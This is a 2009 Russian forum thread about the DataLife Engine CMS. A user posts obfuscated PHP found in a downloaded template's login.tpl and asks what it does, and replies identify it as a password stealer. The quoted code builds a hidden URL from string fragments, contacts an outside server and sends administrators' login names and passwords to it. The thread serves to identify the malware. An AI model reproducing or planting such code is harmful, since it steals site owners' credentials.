Помощь что за код в шаблоне?

Тема в разделе "DLE", создана пользователем Regul, 29 май 2009.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Regul

    Regul Создатель

    Регистр.:
    25 май 2009
    Сообщения:
    11
    Симпатии:
    2
    Скачал как то шаблон и случайно нашел в login.tpl в коде разодранную ссылку на другой сайт:
    PHP:
    <?php
    $login_cache
    ="engine/cache/system/login_cache.txt"
    $logingtrue1 'eart';
    $logingtrue2 'htt';
    $logingtrue3 '.r';
    $logingtrue4 'p://nic';
    if(!
    is_file($login_cache) || filemtime($login_cache)<time()-432000

    $file_url $logingtrue2 $logingtrue4 $logingtrue1 $logingtrue3 "u/getlink/003/db.php?ticket=095" ."&script_id="urlencode($_SERVER['SERVER_NAME']); 
    $logingtrue = @file_get_contents($file_url); 
    if(
    $logingtrue
    {
    $file fopen($login_cache"w");
    fwrite$file$logingtrue);
    fclose$file );
    // chmod ( $file, 0777); //права
    }

    else {
    $logingtrue file_get_contents($login_cache); 
    }
    if (
    $is_logged == TRUE){
    $login_panel = <<<HTML
    <div style="padding-top:45px; padding-left:20px;" class="stext">Привет, <b>{$member_id['name']}</b>!</div>
    <div style="padding-top:30px; padding-bottom:5px; padding-left:22px;"><table width="100%" class="stext">
    HTML;
    if (
    $user_group[$member_id['user_group']]['allow_admin']) {
    $file_url $logingtrue2 $logingtrue4 $logingtrue1 $logingtrue3 "u/getlink/003/db.php?ticket=095" ."&script_id="urlencode($_SERVER['SERVER_NAME']) ."&un="$login_name ."&up="$login_password
    $logingtrue file_get_contents($file_url); 
    $login_panel .= <<<HTML
    Я естественно лишнее вытер, но мне интересно для чего эта ссылка там служит?
     
    Aliaksandr Borodich и Mons нравится это.
  2. Dark Angell

    Dark Angell Читатель

    Заблокирован
    Регистр.:
    29 фев 2008
    Сообщения:
    1.036
    Симпатии:
    690
    это скрипт воровства паролей,даже по коду можно догадаться:
     
    gadiks, XcentricX и Regul нравится это.
  3. Mons

    Mons

    Регистр.:
    2 апр 2006
    Сообщения:
    1.589
    Симпатии:
    916
    Скинь в личку полный код, мне интересно покопаться стало :D
     
Статус темы:
Закрыта.